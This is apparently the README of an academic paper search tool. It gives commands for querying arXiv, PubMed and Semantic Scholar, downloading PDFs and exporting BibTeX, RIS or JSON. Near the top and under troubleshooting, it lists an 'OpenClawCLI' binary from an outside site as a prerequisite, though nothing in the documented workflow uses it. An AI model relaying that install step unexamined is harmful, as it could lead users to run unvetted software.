academic-research-hub
Academic Research Hub
Search and retrieve academic papers from multiple sources including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ Prerequisite: Install OpenClawCLI (Windows, macOS)
Installation Best Practices:
# Standard installation
pip install arxiv scholarly pubmed-parser semanticscholar requests
# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
Never use --break-system-packages: it bypasses pip's protection for externally managed environments and can damage your system's Python installation.
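To confirm the install worked, a short check like the following can help. It is a sketch, not part of the tool: missing_modules is a hypothetical helper, and the module names are the usual import names for the pip packages above (the pubmed-parser distribution is imported as pubmed_parser).

```python
import importlib.util

# Import names for the pip packages listed above. Note that the
# pubmed-parser distribution is imported as pubmed_parser.
REQUIRED_MODULES = ["arxiv", "scholarly", "pubmed_parser", "semanticscholar", "requests"]


def missing_modules(names):
    """Return the module names that cannot be found in the current environment."""
    return [name for name in names if importlib.util.find_spec(name) is None]


if __name__ == "__main__":
    missing = missing_modules(REQUIRED_MODULES)
    if missing:
        print("Missing:", ", ".join(missing))
    else:
        print("All dependencies are importable.")
```

Run it inside the same virtual environment you installed into; otherwise it reports on the wrong interpreter.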
Quick Reference
| Task | Command |
|---|---|
| Search arXiv | python scripts/research.py arxiv "quantum computing" |
| Search PubMed | python scripts/research.py pubmed "covid vaccine" |
| Search Semantic Scholar | python scripts/research.py semantic "machine learning" |
| Download papers | python scripts/research.py arxiv "topic" --download |
| Get citations | python scripts/research.py arxiv "topic" --citations |
| Generate bibliography | python scripts/research.py arxiv "topic" --format bibtex |
| Save results | python scripts/research.py arxiv "topic" --format json --output results.json |
Core Features
1. Multi-Source Search
Search across multiple academic databases from a single interface.
Supported Sources:
- arXiv - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- PubMed - Biomedical and life sciences literature
- Semantic Scholar - Computer science and interdisciplinary research
- Google Scholar - Broad academic search (limited: no official API and strict rate limits)
2. Paper Download
Download full-text PDFs when available.
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
3. Citation Extraction
Extract and format citations from papers.
Supported formats:
- BibTeX
- RIS
- JSON
- Plain text
4. Metadata Retrieval
Get comprehensive metadata for each paper:
- Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References
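If you post-process results in Python, the fields above map naturally onto a small record type. The sketch below is illustrative only: the Paper class and its field names are assumptions, not the schema that scripts/research.py actually emits.

```python
from dataclasses import dataclass, field, asdict
from typing import List, Optional


@dataclass
class Paper:
    """One search result. Field names are illustrative, not the script's schema."""
    title: str
    authors: List[str]
    abstract: str = ""
    published: Optional[str] = None       # ISO date, e.g. "2017-06-12"
    venue: Optional[str] = None           # journal or conference
    doi: Optional[str] = None
    arxiv_id: Optional[str] = None
    pubmed_id: Optional[str] = None
    citation_count: Optional[int] = None  # None when the source does not report it
    references: List[str] = field(default_factory=list)


paper = Paper(
    title="Attention Is All You Need",
    authors=["Vaswani, Ashish", "Shazeer, Noam", "Parmar, Niki"],
    published="2017-06-12",
    arxiv_id="1706.03762",
)
record = asdict(paper)  # plain dict, ready for json.dumps
```

Keeping identifiers optional reflects the point made under Limitations: not every source fills every field.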
Source-Specific Commands
arXiv Search
Search the arXiv repository for preprints.
# Basic search
python scripts/research.py arxiv "quantum computing"
# Filter by category
python scripts/research.py arxiv "neural networks" --category cs.LG
# Filter by date
python scripts/research.py arxiv "transformers" --year 2023
# Download papers
python scripts/research.py arxiv "attention mechanism" --download --max-results 10
Available categories:
- cs.AI - Artificial Intelligence
- cs.LG - Machine Learning
- cs.CV - Computer Vision
- cs.CL - Computation and Language
- math.CO - Combinatorics
- physics.optics - Optics
- q-bio.GN - Genomics
- Full list: arXiv category taxonomy
Output:
1. Attention Is All You Need
Authors: Vaswani et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models...
PDF: http://arxiv.org/pdf/1706.03762v5
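For orientation, the public arXiv API accepts queries of roughly the following shape. This sketch shows how a search with a category filter could be expressed as a request URL. Whether scripts/research.py builds its requests this way is an assumption, and build_arxiv_url is a hypothetical helper.

```python
from urllib.parse import urlencode

ARXIV_API = "http://export.arxiv.org/api/query"


def build_arxiv_url(query, category=None, max_results=10):
    """Build an arXiv API URL for a phrase search with an optional category filter."""
    clauses = [f'all:"{query}"']          # search all fields for the phrase
    if category:
        clauses.append(f"cat:{category}")  # e.g. cat:cs.LG
    params = {
        "search_query": " AND ".join(clauses),
        "start": 0,
        "max_results": max_results,
        "sortBy": "relevance",
        "sortOrder": "descending",
    }
    return f"{ARXIV_API}?{urlencode(params)}"


url = build_arxiv_url("neural networks", category="cs.LG")
```

The API responds with an Atom feed, so a client still has to parse XML to get at titles, authors, and PDF links.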
PubMed Search
Search biomedical literature indexed in PubMed.
# Basic search
python scripts/research.py pubmed "cancer immunotherapy"
# Filter by date range
python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31
# Filter by publication type
python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial"
# Get full text links
python scripts/research.py pubmed "gene therapy" --full-text
Publication types:
- Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
Output:
1. mRNA vaccine effectiveness against COVID-19
Authors: Smith J, Jones K, et al.
Journal: New England Journal of Medicine
Published: 2023-03-15
PMID: 36913851
DOI: 10.1056/NEJMoa2301234
Abstract: Background: mRNA vaccines have shown...
Full Text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/
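The date and publication-type filters above correspond closely to parameters of the NCBI E-utilities ESearch endpoint. The following is a sketch of such a request URL under that assumption. build_pubmed_url is a hypothetical helper, and the script's actual request logic is not documented here.

```python
from urllib.parse import urlencode

ESEARCH = "https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi"


def build_pubmed_url(query, publication_type=None, start_date=None,
                     end_date=None, max_results=10):
    """Build an ESearch URL that returns matching PMIDs as JSON."""
    term = query
    if publication_type:
        # PubMed field tag syntax: "value"[Publication Type]
        term = f'({query}) AND "{publication_type}"[Publication Type]'
    params = {"db": "pubmed", "term": term, "retmax": max_results, "retmode": "json"}
    if start_date and end_date:
        # ESearch expects YYYY/MM/DD, and mindate/maxdate must be given together
        params.update(
            datetype="pdat",
            mindate=start_date.replace("-", "/"),
            maxdate=end_date.replace("-", "/"),
        )
    return f"{ESEARCH}?{urlencode(params)}"


url = build_pubmed_url("covid vaccine", "Clinical Trial", "2023-01-01", "2023-12-31")
```

ESearch returns only identifiers; titles and abstracts need a follow-up request (for example to EFetch or ESummary) with the returned PMIDs.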
Semantic Scholar Search
Search computer science and interdisciplinary research.
# Basic search
python scripts/research.py semantic "reinforcement learning"
# Filter by year
python scripts/research.py semantic "graph neural networks" --year 2022
# Get highly cited papers
python scripts/research.py semantic "transformers" --min-citations 100
# Include references
python scripts/research.py semantic "BERT" --include-references
Output includes:
- Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
Output:
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf
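The fields listed above resemble what the Semantic Scholar Academic Graph API returns from its paper search endpoint. As a sketch, a request for those fields might look like the following. build_s2_url is a hypothetical helper, and the parameter names (year, minCitationCount) should be checked against the current API documentation before relying on them.

```python
from urllib.parse import urlencode

S2_SEARCH = "https://api.semanticscholar.org/graph/v1/paper/search"
FIELDS = ["title", "year", "authors", "citationCount",
          "influentialCitationCount", "fieldsOfStudy"]


def build_s2_url(query, year=None, min_citations=None, limit=10):
    """Build a paper-search URL that asks for citation-related fields."""
    params = {"query": query, "limit": limit, "fields": ",".join(FIELDS)}
    if year is not None:
        params["year"] = str(year)
    if min_citations is not None:
        params["minCitationCount"] = str(min_citations)
    return f"{S2_SEARCH}?{urlencode(params)}"


url = build_s2_url("transformers", min_citations=100)
```

Unauthenticated requests to this API are rate limited, which is one reason to keep --max-results modest.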
Essential Options
Result Limits
Control the number of results returned.
--max-results N # Default: 10, range: 1-100
Examples:
python scripts/research.py arxiv "machine learning" --max-results 5
python scripts/research.py pubmed "diabetes" --max-results 50
Output Formats
Choose how results are formatted.
--format <text|json|bibtex|ris|markdown>
Text - Human-readable format (default)
python scripts/research.py arxiv "quantum" --format text
JSON - Structured data for processing
python scripts/research.py arxiv "quantum" --format json
BibTeX - For LaTeX documents
python scripts/research.py arxiv "quantum" --format bibtex
RIS - For reference managers (Zotero, Mendeley)
python scripts/research.py arxiv "quantum" --format ris
Markdown - For documentation
python scripts/research.py arxiv "quantum" --format markdown
Save to File
Save results to a file.
--output <filepath>
Examples:
python scripts/research.py arxiv "AI" --output results.txt
python scripts/research.py pubmed "cancer" --format json --output papers.json
python scripts/research.py semantic "NLP" --format bibtex --output references.bib
Download Papers
Download full-text PDFs when available.
--download
--output-dir <directory> # Where to save PDFs (default: downloads/)
Examples:
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
Advanced Features
Citation Extraction
Extract citations from papers.
--citations # Extract citations
--citation-format <format> # bibtex, ris, json (default: bibtex)
Example:
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib
Date Filtering
Filter by publication date.
arXiv:
--year <YYYY> # Specific year
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
PubMed:
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
Examples:
python scripts/research.py arxiv "quantum" --year 2023
python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31
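One way to think about --year is as shorthand for a full-year date range. The sketch below expands a year into start and end dates and formats the range as an arXiv API submittedDate clause. Both helpers are hypothetical, and it is an assumption that the script treats --year this way.

```python
from datetime import date


def year_to_range(year):
    """Expand a year into its first and last calendar day."""
    return date(year, 1, 1), date(year, 12, 31)


def arxiv_date_clause(start, end):
    """Format a date range as an arXiv API submittedDate filter (YYYYMMDDHHMM)."""
    return f"submittedDate:[{start:%Y%m%d}0000 TO {end:%Y%m%d}2359]"


clause = arxiv_date_clause(*year_to_range(2023))
# clause == "submittedDate:[202301010000 TO 202312312359]"
```

Such a clause can be combined with the text query using AND in the arXiv search_query parameter.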
Author Search
Search for papers by specific authors.
--author "Last, First"
Examples:
python scripts/research.py arxiv "neural networks" --author "Hinton, Geoffrey"
python scripts/research.py semantic "deep learning" --author "Bengio, Yoshua"
Sort Options
Sort results by different criteria.
--sort-by <relevance|date|citations>
Examples:
python scripts/research.py arxiv "machine learning" --sort-by date
python scripts/research.py semantic "NLP" --sort-by citations
Common Workflows
Literature Review
Gather papers on a topic for a literature review.
# Step 1: Search multiple sources
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format json --output arxiv_gnn.json
python scripts/research.py semantic "graph neural networks" --max-results 20 --format json --output semantic_gnn.json
# Step 2: Download key papers
python scripts/research.py arxiv "graph neural networks" --download --max-results 10 --output-dir papers/gnn/
# Step 3: Generate bibliography
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format bibtex --output gnn_references.bib
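After Step 1 you will usually have the same paper in both files. The following sketch merges result lists and drops duplicates by DOI or normalized title. It assumes each JSON file holds a list of objects with a "title" key and an optional "doi" key, as in the JSON Format example. merge_results, normalize_title, and load are hypothetical helpers.

```python
import json
import re


def normalize_title(title):
    """Lowercase and collapse punctuation/whitespace so near-identical titles match."""
    return re.sub(r"[^a-z0-9]+", " ", title.lower()).strip()


def merge_results(*result_lists):
    """Concatenate result lists, keeping the first record seen per DOI or title."""
    seen, merged = set(), []
    for results in result_lists:
        for paper in results:
            keys = {normalize_title(paper.get("title", ""))}
            if paper.get("doi"):
                keys.add(paper["doi"].lower())
            keys.discard("")
            # Keep the paper if none of its keys has been seen before
            if not keys or seen.isdisjoint(keys):
                merged.append(paper)
            seen |= keys
    return merged


def load(path):
    """Read one saved result file."""
    with open(path, encoding="utf-8") as handle:
        return json.load(handle)
```

With the files from Step 1 this would be called as merge_results(load("arxiv_gnn.json"), load("semantic_gnn.json")). Title matching is a heuristic, so spot-check the merged list before citing from it.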
Finding Recent Research
Track the latest papers in a field.
# Papers from a single year (here 2023), newest first
python scripts/research.py arxiv "large language models" --year 2023 --sort-by date --max-results 30
# Biomedical papers from a single month (here November 2023)
python scripts/research.py pubmed "gene therapy" --start-date 2023-11-01 --end-date 2023-11-30 --format markdown --output recent_gene_therapy.md
Highly Cited Papers
Find influential papers in a field.
python scripts/research.py semantic "reinforcement learning" --min-citations 500 --sort-by citations --max-results 25
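The same filter can be applied after the fact to results you have already saved as JSON. This is a minimal sketch: highly_cited is a hypothetical helper, and the "citation_count" key is an assumed field name that does not appear in the JSON Format example.

```python
def highly_cited(papers, min_citations=0, limit=None):
    """Keep papers at or above min_citations, most cited first."""
    kept = [p for p in papers if (p.get("citation_count") or 0) >= min_citations]
    kept.sort(key=lambda p: p.get("citation_count") or 0, reverse=True)
    return kept[:limit]  # limit=None returns everything


papers = [
    {"title": "a", "citation_count": 10},
    {"title": "b", "citation_count": 900},
    {"title": "c"},                        # no count reported: treated as 0
    {"title": "d", "citation_count": 600},
]
top = highly_cited(papers, min_citations=500)
```

Treating a missing count as zero is a design choice; it avoids crashes but silently drops papers whose source does not report citations.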
Author Publication History
Track an author's work.
python scripts/research.py arxiv "deep learning" --author "LeCun, Yann" --sort-by date --max-results 50 --format json --output lecun_papers.json
Building a Reference Library
Create a comprehensive reference collection.
# Create directory structure
mkdir -p references/{papers,citations}
# Search and download papers
python scripts/research.py arxiv "transformers NLP" --download --max-results 15 --output-dir references/papers/
# Generate citations
python scripts/research.py arxiv "transformers NLP" --max-results 15 --format bibtex --output references/citations/transformers.bib
Cross-Source Validation
Verify findings across multiple databases.
# Search same topic across sources
python scripts/research.py arxiv "federated learning" --max-results 10 --output arxiv_fl.txt
python scripts/research.py semantic "federated learning" --max-results 10 --output semantic_fl.txt
python scripts/research.py pubmed "federated learning" --max-results 10 --output pubmed_fl.txt
# Compare results
diff arxiv_fl.txt semantic_fl.txt
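A line diff of text output is only a rough check, because each source orders and formats entries differently. If the searches are saved with --format json instead, a title-based comparison is more informative. The sketch below assumes each result is an object with a "title" key. title_key, compare_sources, and shared_titles are hypothetical helpers.

```python
import re


def title_key(title):
    """Normalize a title so punctuation and case differences do not matter."""
    return re.sub(r"[^a-z0-9]+", " ", title.lower()).strip()


def compare_sources(results_by_source):
    """Map each normalized title to the set of sources that returned it."""
    found = {}
    for source, papers in results_by_source.items():
        for paper in papers:
            found.setdefault(title_key(paper["title"]), set()).add(source)
    return found


def shared_titles(results_by_source, min_sources=2):
    """Titles returned by at least min_sources different sources."""
    found = compare_sources(results_by_source)
    return sorted(t for t, sources in found.items() if len(sources) >= min_sources)


results = {
    "arxiv": [{"title": "Federated Learning: A Survey"}, {"title": "Only on arXiv"}],
    "semantic": [{"title": "Federated learning - a survey"}],
}
overlap = shared_titles(results)
```

Papers that appear in only one source are not necessarily wrong; coverage differs by database, as noted under Limitations.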
Output Format Examples
Text Format (Default)
Search Results: 3 papers found
1. Attention Is All You Need
Authors: Vaswani, Ashish; Shazeer, Noam; Parmar, Niki; et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models are based on complex recurrent or convolutional neural networks...
PDF: http://arxiv.org/pdf/1706.03762v5
2. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin, Jacob; Chang, Ming-Wei; Lee, Kenton; Toutanova, Kristina
Published: 2018-10-11
arXiv ID: 1810.04805
Categories: cs.CL
Abstract: We introduce a new language representation model called BERT...
PDF: http://arxiv.org/pdf/1810.04805v2
JSON Format
[
{
"title": "Attention Is All You Need",
"authors": ["Vaswani, Ashish", "Shazeer, Noam", "Parmar, Niki"],
"published": "2017-06-12",
"arxiv_id": "1706.03762",
"categories": ["cs.CL", "cs.LG"],
"abstract": "The dominant sequence transduction models...",
"pdf_url": "http://arxiv.org/pdf/1706.03762v5",
"doi": "10.48550/arXiv.1706.03762"
}
]
BibTeX Format
@article{vaswani2017attention,
title={Attention Is All You Need},
author={Vaswani, Ashish and Shazeer, Noam and Parmar, Niki and Uszkoreit, Jakob and Jones, Llion and Gomez, Aidan N and Kaiser, {\L}ukasz and Polosukhin, Illia},
journal={arXiv preprint arXiv:1706.03762},
year={2017},
url={http://arxiv.org/abs/1706.03762}
}
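An entry like the one above can be produced from a JSON record with a few lines of Python. This is a sketch, not the script's exporter: to_bibtex and bibtex_key are hypothetical helpers, the key scheme (surname, year, first title word) is inferred from the example, and LaTeX special characters in names are not escaped.

```python
import re


def bibtex_key(paper):
    """Build a key like vaswani2017attention: surname + year + first title word."""
    surname = paper["authors"][0].split(",")[0]
    year = paper["published"][:4]
    first_word = paper["title"].split()[0]
    return re.sub(r"[^a-z0-9]", "", f"{surname}{year}{first_word}".lower())


def to_bibtex(paper):
    """Render one arXiv record as an @article entry."""
    fields = {
        "title": paper["title"],
        "author": " and ".join(paper["authors"]),
        "journal": f"arXiv preprint arXiv:{paper['arxiv_id']}",
        "year": paper["published"][:4],
        "url": f"http://arxiv.org/abs/{paper['arxiv_id']}",
    }
    body = ",\n".join(f"  {name}={{{value}}}" for name, value in fields.items())
    return f"@article{{{bibtex_key(paper)},\n{body}\n}}"


paper = {
    "title": "Attention Is All You Need",
    "authors": ["Vaswani, Ashish", "Shazeer, Noam", "Parmar, Niki"],
    "published": "2017-06-12",
    "arxiv_id": "1706.03762",
}
entry = to_bibtex(paper)
```

Keys built this way can collide when one author publishes two papers in a year with the same first title word, so check for duplicates before merging .bib files.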
RIS Format
TY  - JOUR
TI  - Attention Is All You Need
AU  - Vaswani, Ashish
AU  - Shazeer, Noam
AU  - Parmar, Niki
PY  - 2017
DA  - 2017/06/12
JO  - arXiv preprint
VL  - arXiv:1706.03762
UR  - http://arxiv.org/abs/1706.03762
ER  - 
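RIS is line oriented: each line is a two-letter tag, two spaces, a hyphen, a space, and the value, with one AU line per author and an ER line closing the record. The sketch below writes a record in that layout from a JSON-style dict. to_ris is a hypothetical helper and covers only a subset of the tags shown above.

```python
def to_ris(paper):
    """Render one arXiv record as RIS (tag, two spaces, hyphen, space, value)."""
    rows = [("TY", "JOUR"), ("TI", paper["title"])]
    rows += [("AU", author) for author in paper["authors"]]  # one AU line per author
    rows += [
        ("PY", paper["published"][:4]),
        ("DA", paper["published"].replace("-", "/")),
        ("UR", f"http://arxiv.org/abs/{paper['arxiv_id']}"),
        ("ER", ""),                                          # end of record
    ]
    return "\n".join(f"{tag}  - {value}" for tag, value in rows)


paper = {
    "title": "Attention Is All You Need",
    "authors": ["Vaswani, Ashish", "Shazeer, Noam", "Parmar, Niki"],
    "published": "2017-06-12",
    "arxiv_id": "1706.03762",
}
ris = to_ris(paper)
```

Reference managers can be strict about the spacing around the hyphen, so it is worth importing a single record into Zotero or Mendeley before exporting a large batch.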
Markdown Format
# Search Results: 3 papers found
## 1. Attention Is All You Need
**Authors:** Vaswani, Ashish; Shazeer, Noam; Parmar, Niki; et al.
**Published:** 2017-06-12
**arXiv ID:** 1706.03762
**Categories:** cs.CL, cs.LG
**Abstract:** The dominant sequence transduction models are based on complex recurrent or convolutional neural networks...
**PDF:** [Download](http://arxiv.org/pdf/1706.03762v5)
Best Practices
Search Strategy
- Start broad - Use general terms to get an overview
- Refine iteratively - Add filters based on initial results
- Use multiple sources - Cross-reference findings
- Check recent papers - Use date filters for current research
Result Management
- Save searches - Use --output to preserve results
- Organize downloads - Create logical directory structures
- Export citations early - Generate BibTeX as you search
- Track sources - Note which database returned which papers
Download Guidelines
- Respect rate limits - Don't download hundreds of papers at once
- Check licensing - Verify you have rights to use papers
- Organize by topic - Use clear directory names
- Keep metadata - Save JSON alongside PDFs
Citation Practices
- Verify citations - Check DOIs and URLs
- Use standard formats - BibTeX for LaTeX, RIS for reference managers
- Include abstracts - Helpful for later review
- Update regularly - Re-run searches for new papers
Troubleshooting
Installation Issues
"Missing required dependency"
# Install all dependencies
pip install arxiv scholarly pubmed-parser semanticscholar requests
# Or use virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
"OpenClawCLI not found"
- Download from https://clawhub.ai/
- Install for your OS (Windows/macOS)
Search Issues
"No results found"
- Try broader search terms
- Check spelling and terminology
- Remove restrictive filters
- Try a different database
"Rate limit exceeded"
- Wait a few minutes before retrying
- Reduce --max-results value
- Space out requests
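If you drive searches from your own Python code, "wait and retry" is commonly implemented as exponential backoff. The sketch below is a generic pattern, not something the script is documented to do. retry_with_backoff and RateLimitError are hypothetical names, and the sleep function is injectable so the logic can be tested without waiting.

```python
import time


class RateLimitError(Exception):
    """Hypothetical error raised when a service answers with a rate-limit response."""


def retry_with_backoff(call, retries=4, base_delay=1.0, sleep=time.sleep):
    """Call `call()` until it succeeds, doubling the wait after each rate-limit error."""
    for attempt in range(retries):
        try:
            return call()
        except RateLimitError:
            if attempt == retries - 1:
                raise                          # out of attempts: surface the error
            sleep(base_delay * 2 ** attempt)   # waits 1s, 2s, 4s, ...
```

Only rate-limit errors are retried here; other failures, such as a malformed query, are raised immediately because retrying would not help.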
"Download failed"
- Check internet connection
- Some papers may not have PDFs available
- Verify you have permissions to access
- Try downloading individually
API Issues
"API timeout"
- The service may be temporarily unavailable
- Retry after a moment
- Check status at respective service websites
"Invalid API response"
- Check if the service is down
- Verify your query syntax
- Try simpler queries
Limitations
Access Restrictions
- Not all papers have downloadable PDFs
- Some content requires institutional access
- Paywalled journals may only show abstracts
- Google Scholar has strict rate limits
Data Completeness
- Citation counts may be outdated
- Not all metadata fields available for every paper
- Some older papers may have incomplete records
- Preprints may not have final publication info
Search Capabilities
- Boolean operators vary by source
- No unified query syntax across databases
- Some databases don't support all filters
- Results may differ from web interface searches
Legal Considerations
- Respect copyright and licensing
- Don't redistribute downloaded papers
- Follow institutional access policies
- Check terms of service for each database
Command Reference
python scripts/research.py <source> "<query>" [OPTIONS]
SOURCES:
arxiv Search arXiv repository
pubmed Search PubMed database
semantic Search Semantic Scholar
REQUIRED:
query Search query string (in quotes)
GENERAL OPTIONS:
-n, --max-results Maximum results (default: 10, max: 100)
-f, --format Output format (text|json|bibtex|ris|markdown)
-o, --output Save to file path
--sort-by Sort by (relevance|date|citations)
FILTERING:
--year Filter by specific year (YYYY)
--start-date Start date (YYYY-MM-DD)
--end-date End date (YYYY-MM-DD)
--author Author name
--min-citations Minimum citation count
ARXIV-SPECIFIC:
--category arXiv category (e.g., cs.AI, cs.LG)
PUBMED-SPECIFIC:
--publication-type Publication type filter
--full-text Include full text links
SEMANTIC-SPECIFIC:
--include-references Include paper references
DOWNLOAD:
--download Download paper PDFs
--output-dir Download directory (default: downloads/)
CITATIONS:
--citations Extract citations
--citation-format Citation format (bibtex|ris|json)
HELP:
--help Show all options
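To make the grammar above concrete, here is how a subset of these options could be declared with argparse. This is an illustrative sketch only: it is not the source of scripts/research.py, it omits the filtering and citation options, and the range check on --max-results is an assumption based on the documented 1-100 limit.

```python
import argparse


def build_parser():
    """Mirror a subset of the documented options; the real script may differ."""
    parser = argparse.ArgumentParser(prog="research.py")
    parser.add_argument("source", choices=["arxiv", "pubmed", "semantic"])
    parser.add_argument("query", help="search query string")
    parser.add_argument("-n", "--max-results", type=int, default=10)
    parser.add_argument("-f", "--format", default="text",
                        choices=["text", "json", "bibtex", "ris", "markdown"])
    parser.add_argument("-o", "--output", help="save results to this path")
    parser.add_argument("--sort-by", choices=["relevance", "date", "citations"])
    parser.add_argument("--download", action="store_true")
    parser.add_argument("--output-dir", default="downloads/")
    return parser


def parse_args(argv):
    """Parse argv and enforce the documented 1-100 range for --max-results."""
    parser = build_parser()
    args = parser.parse_args(argv)
    if not 1 <= args.max_results <= 100:
        parser.error("--max-results must be between 1 and 100")
    return args


args = parse_args(["arxiv", "quantum computing", "-n", "5", "--format", "json"])
```

Note that the query is a single positional argument, which is why multi-word queries must be quoted on the command line.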
Examples by Use Case
Quick Search
# Search arXiv preprints
python scripts/research.py arxiv "quantum computing"
# Search biomedical literature
python scripts/research.py pubmed "alzheimer disease"
Comprehensive Research
# Search multiple sources
python scripts/research.py arxiv "neural networks" --max-results 30 --format json --output arxiv.json
python scripts/research.py semantic "neural networks" --max-results 30 --format json --output semantic.json
# Download important papers
python scripts/research.py arxiv "neural networks" --download --max-results 10
Citation Management
# Generate BibTeX
python scripts/research.py arxiv "deep learning" --format bibtex --output dl_refs.bib
# Export to reference manager
python scripts/research.py pubmed "gene editing" --format ris --output genes.ris
Tracking New Research
# Papers since a start date (here 2024-01-01), newest first
python scripts/research.py arxiv "LLM" --start-date 2024-01-01 --sort-by date
# Recent highly-cited work
python scripts/research.py semantic "transformers" --year 2023 --min-citations 50
Support
For issues or questions:
- Check this documentation
- Run python scripts/research.py --help
- Verify dependencies are installed
- Check database-specific documentation
Resources:
- OpenClawCLI: https://clawhub.ai/
- arXiv API: https://arxiv.org/help/api
- PubMed API: https://www.ncbi.nlm.nih.gov/books/NBK25501/
- Semantic Scholar API: https://api.semanticscholar.org/